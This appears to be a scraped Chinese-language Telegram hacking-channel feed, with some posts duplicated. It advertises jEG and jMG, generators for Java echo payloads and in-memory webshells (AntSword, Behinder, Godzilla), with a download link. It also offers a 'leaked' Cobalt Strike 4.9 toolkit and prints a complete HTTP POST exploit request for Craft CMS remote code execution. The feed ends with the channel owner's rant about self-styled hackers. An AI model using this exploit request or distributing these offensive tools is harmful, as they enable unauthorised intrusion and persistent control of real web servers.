jEG-gui-1.0.0.jar
2 MB
jEG (Java Echo Generator ) 是一款支持高度自定义的 Java 回显载荷生成工具。
主要功能如下:
支持的中间件和框架(Tomcat/Resin/Jetty/WebLogic/WebSphere/Undertow/SpringMVC/Struts2)
支持的执行模式(Command/Code)
支持的输出格式 (BASE64/BCEL/BIGINTEGER/CLASS/JAR/JS)
主要功能如下:
支持的中间件和框架(Tomcat/Resin/Jetty/WebLogic/WebSphere/Undertow/SpringMVC/Struts2)
支持的执行模式(Command/Code)
支持的输出格式 (BASE64/BCEL/BIGINTEGER/CLASS/JAR/JS)
jMG-gui-1.0.7.beta2.jar
9 MB
jMG (Java Memshell Generator) 是一款支持高度自定义的 Java 内存马生成工具,提供常见中间件的内存马注入支持。
主要功能如下:
支持的中间件和框架 (Tomcat/Resin/Jetty/WebLogic/WebSphere/Undertow/GlassFish/SpringMVC/SpringWebFlux)
支持的工具 (AntSword/Behinder/Godzilla/Suo5)
支持的内存马类型 (Filter/Listener/Interceptor/HandlerMethod)
支持的输出格式 (BASE64/BCEL/CLASS/JS/JSP/JAR/BIGINTEGER)
支持的辅助模块 (专项漏洞封装/表达式语句封装)
主要功能如下:
支持的中间件和框架 (Tomcat/Resin/Jetty/WebLogic/WebSphere/Undertow/GlassFish/SpringMVC/SpringWebFlux)
支持的工具 (AntSword/Behinder/Godzilla/Suo5)
支持的内存马类型 (Filter/Listener/Interceptor/HandlerMethod)
支持的输出格式 (BASE64/BCEL/CLASS/JS/JSP/JAR/BIGINTEGER)
支持的辅助模块 (专项漏洞封装/表达式语句封装)
❤1
https://www.123pan.com/s/l1eA-ETHD3.html 提取码:i1x3
Cobalt Strike 4.9 (September 19, 2023) Leaked Toolkit
Hash : c0565d03d5f6335311927c6f93f3f5689804da596e6734b1ac26bf4b12cc85ed
Cobalt Strike 4.9 (September 19, 2023) Leaked Toolkit
Hash : c0565d03d5f6335311927c6f93f3f5689804da596e6734b1ac26bf4b12cc85ed
Craft CMS 远程代码执行漏洞exp
POST /index.php HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36Content-Length: 242Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateaction=conditions/render&test[userCondition]=craft\elements\conditions\users\UserCondition&config={"name":"test[userCondition]","as xyz":{"class":"\\GuzzleHttp\\Psr7\\FnStream", "__construct()": [{"close":null}],"_fn_close":"phpinfo"}}
POST /index.php HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36Content-Length: 242Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateaction=conditions/render&test[userCondition]=craft\elements\conditions\users\UserCondition&config={"name":"test[userCondition]","as xyz":{"class":"\\GuzzleHttp\\Psr7\\FnStream", "__construct()": [{"close":null}],"_fn_close":"phpinfo"}}
有群友问我天天搁群里怼网络装哥大黑客,想过有没有一种可能哪天真的有那种大神来tg了被人家打脸怎么办
首先我自认为看人还是很准的,就算有人说什么自己天天打gov核心政企资产这种特别离谱的我也不会什么都不问清楚上来就怼,怼的都是那种没图没证据然后平时技术讨论半句话插不上一到成果总结就概括性瞎bb,天天打这个打那个的这类人,我觉得是装哥的概率还是很大的。我的判断不是你们想的看到战绩离谱特别厉害就判断成假的,我更多时候结合的都是他平时在群里的发言,像416这种真有东西的聊两句其实就能看出来。
其次我要是真错了也无所谓,该道歉道歉。真有这种超级大佬在群里别说道歉我跪着给他磕俩头都行。忙着巴结都来不及哪里会考虑什么打脸了尴不尴尬的事😅
首先我自认为看人还是很准的,就算有人说什么自己天天打gov核心政企资产这种特别离谱的我也不会什么都不问清楚上来就怼,怼的都是那种没图没证据然后平时技术讨论半句话插不上一到成果总结就概括性瞎bb,天天打这个打那个的这类人,我觉得是装哥的概率还是很大的。我的判断不是你们想的看到战绩离谱特别厉害就判断成假的,我更多时候结合的都是他平时在群里的发言,像416这种真有东西的聊两句其实就能看出来。
其次我要是真错了也无所谓,该道歉道歉。真有这种超级大佬在群里别说道歉我跪着给他磕俩头都行。忙着巴结都来不及哪里会考虑什么打脸了尴不尴尬的事😅
👍4